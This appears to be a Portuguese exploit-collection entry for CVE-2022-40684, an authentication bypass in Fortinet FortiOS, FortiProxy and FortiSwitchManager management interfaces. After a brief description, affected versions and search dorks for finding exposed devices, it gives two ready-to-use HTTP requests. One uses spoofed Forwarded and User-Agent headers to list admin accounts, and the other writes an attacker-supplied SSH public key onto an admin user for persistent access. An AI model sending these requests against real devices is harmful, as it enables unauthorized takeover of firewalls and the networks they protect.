
PoC e exploit para CVE-2022-40684, um bypass de autenticação nas interfaces de gerenciamento do Fortinet FortiOS, FortiProxy e FortiSwitchManager, permitindo acesso administrativo não autorizado através de requisições HTTP manipuladas.
Qualquer indivíduo ou organização que utilize a rede deve cumprir a lei constitucional, a ordem pública, respeitar a moral social, não prejudicar a segurança da rede, e não usar a rede para prejudicar a segurança, honra e interesses nacionais.
A Fortinet é uma fornecedora globalmente conhecida de produtos e soluções de segurança cibernética, incluindo firewalls, antivírus, sistemas de prevenção de intrusões e componentes de segurança de endpoints. Na interface de gerenciamento dos produtos afetados FortiOS, FortiProxy e FortiSwitchManager, é possível contornar a autenticação usando um caminho ou canal alternativo e operar a interface de gerenciamento sem autenticação por meio de solicitações HTTP ou HTTPS especialmente criadas.
Alto
FortiOS versão 7.2.0 - 7.2.1
FortiOS versão 7.0.0 - 7.0.6
FortiProxy versão 7.2.0
FortiProxy versão 7.0.0 - 7.0.6
FortiSwitchManager versão 7.2.0
FortiSwitchManager versão 7.0.0
title="FortiProxy"
title="FortiGate"

GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json
{"ssh-public-key1": "\"公钥内容\""}

